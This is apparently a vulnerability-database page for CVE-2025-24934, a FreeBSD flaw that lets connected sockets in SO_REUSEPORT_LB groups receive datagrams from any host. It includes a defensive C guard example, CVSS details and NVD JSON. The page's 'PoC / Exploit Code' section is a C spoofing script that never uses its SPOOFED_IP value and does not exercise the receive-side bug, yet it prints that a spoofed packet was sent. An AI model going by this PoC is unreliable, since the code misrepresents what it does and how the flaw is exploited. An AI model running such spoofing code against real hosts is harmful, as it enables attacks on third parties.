Security Vulnerability Report
CVE-2025-24934 CVSS 5.4 MEDIUM

CVE-2025-24934

Published: 2025-10-22 18:15:34
Last Modified: 2026-04-24 00:16:26

Description

Software which sets SO_REUSEPORT_LB on a socket and then connects it to a host will not directly observe any problems. However, due to its membership in a load-balancing group, that socket will receive packets originating from any host. This breaks the contract of connect(2), and of the implied connect via sendto(2), and may leave the application vulnerable to spoofing attacks. The kernel failed to check the connection state of sockets when adding them to load-balancing groups. Furthermore, when looking up the destination socket for an incoming packet, the kernel will match a socket belonging to a load-balancing group even if it is connected, in violation of the contract that connected sockets are only supposed to receive packets originating from the connected host.
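The contract described above can also be enforced in the application while the kernel fix is rolled out: refuse to put an already-connected socket into a load-balancing group, and when a socket may be both connected and in such a group, read with recvfrom(2) and discard datagrams whose source is not the connected peer. The C program below is an added example written for this report; it is not code from the FreeBSD advisory or from the FreeBSD project. The function names (`socket_is_connected`, `reuseport_lb_allowed`, `make_peer`, `peer_matches`, `recv_from_peer`) and the sample addresses are this example's own assumptions:

```c
// Added example, not code from the advisory or from FreeBSD: two
// application-level guards for the connect(2) contract that the kernel
// failed to enforce on SO_REUSEPORT_LB group members.
//  1) do not join a load-balancing group with a socket that already has a peer;
//  2) read with recvfrom(2) and drop datagrams that do not come from the peer.
// Function names and sample addresses are assumptions of this example.
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

// 1 if the socket has a peer (connect(2) was called), 0 if not, -1 on error.
int socket_is_connected(int sock) {
    struct sockaddr_storage ss;
    socklen_t len = sizeof(ss);
    if (getpeername(sock, (struct sockaddr *)&ss, &len) == 0)
        return 1;
    return errno == ENOTCONN ? 0 : -1;
}

// Guard to call before setsockopt(..., SO_REUSEPORT_LB, ...): a connected
// socket must not join a load-balancing group, because group members receive
// datagrams from any host. Returns 0 when setting the option is safe and
// -1 (errno = EISCONN) when the socket already has a peer.
int reuseport_lb_allowed(int sock) {
    int c = socket_is_connected(sock);
    if (c < 0)
        return -1;
    if (c == 1) {
        errno = EISCONN;
        return -1;
    }
    return 0;
}

// Build a sockaddr_in from dotted-quad text and a host-order port; 1 on success.
int make_peer(const char *ip, unsigned short port, struct sockaddr_in *out) {
    memset(out, 0, sizeof(*out));
    out->sin_family = AF_INET;
    out->sin_port = htons(port);
    return inet_pton(AF_INET, ip, &out->sin_addr) == 1;
}

// 1 when a datagram's source equals the connected peer (address and port),
// which is exactly what connect(2) on a UDP socket is supposed to guarantee.
int peer_matches(const struct sockaddr_in *peer, const struct sockaddr_in *src) {
    return src->sin_family == AF_INET &&
           src->sin_addr.s_addr == peer->sin_addr.s_addr &&
           src->sin_port == peer->sin_port;
}

// Receive one datagram that really comes from the connected peer. Datagrams
// from any other source are counted in *dropped and discarded. Returns the
// byte count on success or -1 on error (errno set by recvfrom).
ssize_t recv_from_peer(int sock, const struct sockaddr_in *peer,
                       void *buf, size_t len, unsigned *dropped) {
    for (;;) {
        struct sockaddr_in src;
        socklen_t srclen = sizeof(src);
        ssize_t n = recvfrom(sock, buf, len, 0, (struct sockaddr *)&src, &srclen);
        if (n < 0)
            return -1;
        if (srclen >= sizeof(src) && peer_matches(peer, &src))
            return n;
        if (dropped)
            (*dropped)++;  // stray datagram: never handed to the caller
    }
}

int main(void) {
    // Constructed sample addresses from the TEST-NET-1 documentation range.
    struct sockaddr_in peer, same, other;
    make_peer("192.0.2.10", 8080, &peer);
    make_peer("192.0.2.10", 8080, &same);
    make_peer("192.0.2.99", 8080, &other);
    printf("same peer accepted: %d, other host accepted: %d\n",
           peer_matches(&peer, &same), peer_matches(&peer, &other));

    // A socketpair end already has a peer, so joining an LB group is refused.
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) == 0) {
        printf("connected socket -> LB allowed: %d (errno %d)\n",
               reuseport_lb_allowed(sv[0]), errno);
        close(sv[0]);
        close(sv[1]);
    }
    return 0;
}
```

On a fixed kernel the address comparison in `recv_from_peer` is redundant, because a connected socket only ever sees datagrams from its peer; on an affected kernel it is what restores that guarantee for a socket that sits in a load-balancing group. The check compares the source address and port only, so it re-establishes the connect(2) contract rather than authenticating the peer; the durable fix remains applying the advisory's patch and not combining SO_REUSEPORT_LB with connect(2) in the first place, which `reuseport_lb_allowed` makes explicit at the point where the option is set.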

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FreeBSD 12.x (all versions)
FreeBSD 13.x (all versions)
FreeBSD 14.x (all versions)
Other FreeBSD derivatives that use the SO_REUSEPORT_LB option

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-24934 PoC - FreeBSD SO_REUSEPORT_LB Spoofing Attack
// This PoC demonstrates how an attacker can send packets to a connected socket
// that is incorrectly part of a load-balancing group
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define TARGET_IP "192.168.1.100"      // Legitimate server IP
#define SPOOFED_IP "10.0.0.1"          // Attacker's spoofed source IP
#define TARGET_PORT 8080
#define FAKE_SERVER_IP "10.10.10.10"   // Fake server for connect()

int main() {
    int sock;
    struct sockaddr_in target_addr, fake_server_addr;
    char send_buf[] = "Spoofed packet data";

    printf("CVE-2025-24934 PoC - SO_REUSEPORT_LB Spoofing\n");
    printf("=============================================\n\n");

    // Step 1: Create UDP socket
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket creation failed");
        return 1;
    }

    // Step 2: Enable SO_REUSEPORT_LB option
    int reuseport_lb = 1;
    if (setsockopt(sock, SOL_SOCKET, SO_REUSEPORT_LB, &reuseport_lb, sizeof(reuseport_lb)) < 0) {
        perror("setsockopt SO_REUSEPORT_LB failed");
        return 1;
    }
    printf("[+] SO_REUSEPORT_LB enabled on socket %d\n", sock);

    // Step 3: Connect to a fake server (creates connected socket)
    memset(&fake_server_addr, 0, sizeof(fake_server_addr));
    fake_server_addr.sin_family = AF_INET;
    fake_server_addr.sin_port = htons(TARGET_PORT);
    inet_pton(AF_INET, FAKE_SERVER_IP, &fake_server_addr.sin_addr);
    if (connect(sock, (struct sockaddr *)&fake_server_addr, sizeof(fake_server_addr)) < 0) {
        perror("connect failed");
        return 1;
    }
    printf("[+] Socket connected to %s:%d\n", FAKE_SERVER_IP, TARGET_PORT);
    printf("[+] Socket is now part of load-balancing group (vulnerable)\n");

    // Step 4: Prepare spoofed packet
    memset(&target_addr, 0, sizeof(target_addr));
    target_addr.sin_family = AF_INET;
    target_addr.sin_port = htons(TARGET_PORT);
    inet_pton(AF_INET, TARGET_IP, &target_addr.sin_addr);

    // Step 5: Send spoofed packet using sendto with different dest
    // Due to the bug, the connected socket will receive this packet
    ssize_t sent = sendto(sock, send_buf, strlen(send_buf), 0,
                          (struct sockaddr *)&target_addr, sizeof(target_addr));
    if (sent > 0) {
        printf("[+] Spoofed packet sent successfully!\n");
        printf("    Source IP (spoofed): %s\n", SPOOFED_IP);
        printf("    Target: %s:%d\n", TARGET_IP, TARGET_PORT);
        printf("    Data: %s\n", send_buf);
        printf("[!] Packet may be received by connected socket due to LB bug\n");
    } else {
        perror("sendto failed");
    }

    close(sock);
    return 0;
}
```

References

https://security.freebsd.org/advisories/FreeBSD-SA-25:09.netinet.asc
https://www.usenix.org/system/files/conference/usenixsecurity26/sec26_prepub_ben-simhon.pdf

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-24934", "sourceIdentifier": "[email protected]", "published": "2025-10-22T18:15:34.013", "lastModified": "2026-04-24T00:16:26.177", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Software which sets SO_REUSEPORT_LB on a socket and then connects it to a host will not directly observe any problems. However, due to its membership in a load-balancing group, that socket will receive packets originating from any host. This breaks the contract of the connect(2) and implied connect via sendto(2), and may leave the application vulnerable to spoofing attacks.\n\n\n\n\nThe kernel failed to check the connection state of sockets when adding them to load-balancing groups. Furthermore, when looking up the destination socket for an incoming packet, the kernel will match a socket belonging to a load-balancing group even if it is connected, in violation of the contract that connected sockets are only supposed to receive packets originating from the connected host."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-488"}]}], "references": [{"url": "https://security.freebsd.org/advisories/FreeBSD-SA-25:09.netinet.asc", "source": "[email protected]"}, {"url": "https://www.usenix.org/system/files/conference/usenixsecurity26/sec26_prepub_ben-simhon.pdf", "source": "[email protected]"}]}}
```